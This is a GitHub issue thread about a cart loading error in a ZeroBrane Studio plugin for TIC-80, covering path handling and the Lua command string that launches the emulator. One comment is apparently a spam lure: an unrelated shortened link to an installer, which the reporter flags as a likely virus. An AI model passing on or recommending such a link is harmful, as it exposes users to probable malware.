### ISSUE TITLE
cart loading error

### ISSUE THREAD

**Issue by atesin** [oblerion/ZeroBrane-Studio-with-TIC-80#6]
this bug surfaces after fixing issue #5
```
Program starting as 'F:\Games\tic80\tic80.exe --cmd="load C:\Users\atesin\AppData\Roaming\com.nesbox.tic\TIC-80\zbs-test.tic & import code C:\Users\atesin\AppData\Roaming\com.nesbox.tic\TIC-80\zbs-test.lua"'.
Program 'tic80.exe' started in 'C:\Users\atesin\AppData\Roaming\com.nesbox.tic\TIC-80' (pid: 9788).

 TIC-80 tiny computer
 version 1.1.2837 (be42d6f)
 https://tic80.com (C) 2017-2023

 hello! type help for help

>load C:\Users\atesin\AppData\Roaming\com.nesbox.tic\TIC-80\zbs-test.tic
cart loading error
>import code C:\Users\atesin\AppData\Roaming\com.nesbox.tic\TIC-80\zbs-test.lua
error, C:\Users\atesin\AppData\Roaming\com.nesbox.tic\TIC-80\zbs-test.lua file not loaded
>
```

note "cart loading error" messages

it seems tic80 has a "chrooted" filesystem, it can't understands absolute paths (afaik).... so if the {CART_FOLDER} is `C:\Users\atesin\AppData\Roaming\com.nesbox.tic\TIC-80\` __and suppossing we set as working directory (cwd)__,  just by specifing cart file name should be enough

so, supposing the lua file has same name than cart file, i think the correct way of launching the program may be to set up the working dir before launch tic80, or in absence use "cd" command:

- cd {CART_FOLDER}
- {path.tic80} --cmd="load {CART_NAME} & {CART_NAME}.lua" (note the space before "&") (no need to add ".tic" for cart)
- optionally add a trailing " & run" (configurable?)

for this an additional cart folder variable could be set in config file

this raises me another question... what would happen in case of many lua files?, there should be a way to pick some file as the one to be imported, or merge and import them all in some order

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by atesin** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

i won't run this, looks like a virus... a sudden and unrelated exe file with no additional info?...  no thanks

let's not loose focus, please @oblerion fix this typo in a next release

**Comment by oblerion** [comment]
no need cd, i build path remove function
```lua
function pathremover(path)
  if type(path)=="string" then
    local charfnd = string.byte("/")
    for c=path:len(),1,-1 do
      if path:byte(c) == charfnd then
        return path:sub(c+1,path:len())
      end
    end
  end
  return path
end
```

**Comment by oblerion** [comment]
it is more fast with lua only.
lua contain sprite,map,sfx and music.
```lua 
local cmd = string.format("%s --skip --cmd=%sload %s & run %s",tic80,'"',code,'"')
```
i make 2 interpreter , 
- (TIC-80_LUA) run lua only
- (TIC-80_TIC) code lua -> .tic and run .tic

**Comment by atesin** [comment]
> * optionally add a trailing " & run" (configurable?)

optionally add a trailing `" & save & run"` better, preventing data loss

> `local cmd = string.format("%s --skip --cmd=%sload %s & run %s",tic80,'"',code,'"')`

i am not a lua expert.. how about `local cmd = string.format('%s --skip --cmd="load %s & save & run"', tic80, code)` instead? ( https://lua.org/manual/5.2/manual.html#3.1 = "Literal strings can be delimited by matching single or double quotes, and can contain the following C-like escape sequences: (...) '\\"', '\\'' (...) ")

(edit: thanks for mention me in credits, although i am not sure if my contributions level worth it =D )

**Comment by oblerion** [comment]
> optionally add a trailing " & save & run" better, preventing data loss

i add it in release
> i am not a lua expert.. how about local cmd = string.format('%s --skip --cmd="load %s & save & run"', tic80, code) instead? ( https://lua.org/manual/5.2/manual.html#3.1 = "Literal strings can be delimited by matching single or double quotes, and can contain the following C-like escape sequences: (...) '\"', '\'' (...) ")

I never understand that can be use like it, thank again.

> (edit: thanks for mention me in credits, although i am not sure if my contributions level worth it =D )

Without you, I'd never have come back to this gist.
And you've helped me find bugs/solutions, so that's normal.
